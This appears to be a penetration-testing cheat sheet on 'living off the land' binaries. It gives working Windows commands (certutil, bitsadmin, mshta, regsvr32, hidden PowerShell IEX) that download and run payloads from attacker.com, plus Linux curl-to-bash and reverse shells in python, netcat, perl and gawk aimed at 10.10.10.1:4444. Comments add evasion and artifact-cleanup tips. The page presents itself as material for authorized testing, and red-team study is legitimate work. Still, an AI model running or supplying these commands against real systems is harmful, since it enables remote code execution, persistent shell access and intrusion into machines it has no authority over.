⚠️ Pracivo Security Lab — Post-exploitation techniques for authorized penetration testing. Persistence, exfiltration, pivoting, LOLBins, C2 frameworks.
> Living off the Land (LOLBins)
DEFENSE EVASION
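# LOLBins ("living off the land binaries") = abuse legitimate, vendor-signed
# Windows/Linux binaries for download, execution and encoding so no custom
# tooling has to be dropped on the host.
# They pass signature and allowlist checks because the binary itself is trusted,
# but the command lines below are widely signatured: expect EDR to alert on
# certutil/bitsadmin fetching over http, mshta/regsvr32 given a URL argument, and
# hidden-window PowerShell with IEX/DownloadString. Validate against the target's
# telemetry before relying on any of these on an engagement.
# Reference: lolbas-project.github.io / gtfobins.github.io
# Replace attacker.com / payload.* with your own infrastructure.
# WINDOWS LOLBINS
# certutil — download files and encode/decode base64
# -urlcache also keeps a copy in certutil's URL cache under the user profile;
# clear it afterwards (certutil -urlcache * delete) when artifacts matter.
certutil -urlcache -split -f http://attacker.com/payload.exe payload.exe
certutil -encode payload.exe encoded.b64 # encode to base64 (wrapped in PEM-style BEGIN/END CERTIFICATE lines)
certutil -decode encoded.b64 payload.exe # decode (the wrapper lines are stripped automatically)
# mshta — run HTML Application files. Gets past allowlisting that only blocks
# unsigned executables; mshta.exe is on common block lists (including Microsoft's
# recommended WDAC block rules), so check whether the target's policy denies it.
mshta http://attacker.com/payload.hta
mshta vbscript:Execute("CreateObject(""WScript.Shell"").Run ""cmd /c payload.exe"":Close")
# regsvr32 — load a remote COM scriptlet ("Squiblydoo"): /s silent, /n skip
# DllRegisterServer, /u unregister, /i: hand the URL to DllInstall; scrobj.dll
# fetches and runs the .sct. Same caveat as mshta — a policy that explicitly
# denies regsvr32.exe, or a proxy that blocks the fetch, stops this.
regsvr32 /s /n /u /i:http://attacker.com/payload.sct scrobj.dll
# wscript / cscript — run JavaScript/VBScript from a file
wscript payload.js
cscript payload.vbs
# rundll32 — run exported DLL functions; the mshtml.dll RunHTMLApplication export
# can also host an inline JavaScript payload. Only the prefix is shown here — the
# trailing ";..." is a placeholder for the script body, which this page does not
# include (see the LOLBAS rundll32 entry for the complete form).
rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";...
# bitsadmin — download through the BITS service (deprecated; Start-BitsTransfer
# is the PowerShell equivalent). Not silent: /transfer prints progress to the
# console until the job finishes, and BITS jobs are recorded in the
# Microsoft-Windows-Bits-Client/Operational event log.
bitsadmin /transfer job http://attacker.com/payload.exe C:\temp\payload.exe
# powershell — download and execute in memory. Nothing is written to disk, but
# this is not artifact-free: with script block logging enabled the script text
# lands in the PowerShell/Operational log (event 4104), and AMSI scans it first.
# -nop: no profile, -w hidden: hidden window, -c: command to run.
powershell -nop -w hidden -c "IEX(New-Object Net.WebClient).DownloadString('http://attacker.com/p.ps1')"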
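# LINUX LOLBINS
# Every reverse shell below connects back to 10.10.10.1:4444 — start a listener
# on the attacker host first (nc -lvnp 4444) and replace the address/port with
# your own.
# curl / wget — fetch a script and pipe it straight into bash.
# -f fails on HTTP errors (without it a 404/error page is piped into bash),
# -sS hides the progress bar but keeps error output, -L follows redirects.
# bash executes the script as it streams, so a connection dropped mid-download
# runs a truncated script; download to a file and inspect it when that matters.
curl -fsSL http://attacker.com/payload.sh | bash
# python — reverse shell: connect, dup the socket onto stdin/stdout/stderr,
# then exec an interactive /bin/sh. socket.socket() with no arguments is
# AF_INET/SOCK_STREAM, i.e. TCP over IPv4.
python3 -c 'import socket,subprocess,os;s=socket.socket();s.connect(("10.10.10.1",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'
# nc (netcat) — reverse shell. -e exists in traditional/GNU netcat and Ncat only;
# the OpenBSD nc installed by default on Debian/Ubuntu has no -e and this line
# fails there.
nc -e /bin/sh 10.10.10.1 4444
# nc without -e — same effect through a named pipe, works with OpenBSD nc.
# mktemp -u avoids a predictable fifo name; the fifo is removed when nc exits.
f=$(mktemp -u); mkfifo "$f"; cat "$f" | /bin/sh -i 2>&1 | nc 10.10.10.1 4444 > "$f"; rm -f "$f"
# perl — reverse shell (same connect-then-dup-onto-socket pattern as the python one)
perl -e 'use Socket;$i="10.10.10.1";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));connect(S,sockaddr_in($p,inet_aton($i)));open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");'
# awk — reverse shell over gawk's /inet/tcp special files. Requires gawk:
# mawk and busybox awk do not implement /inet/*.
awk 'BEGIN{s="/inet/tcp/0/10.10.10.1/4444";for(;;){printf "> " |&s;if((s |& getline c)<=0)break;while((c |& getline)>0)print|&s;close(c)}}'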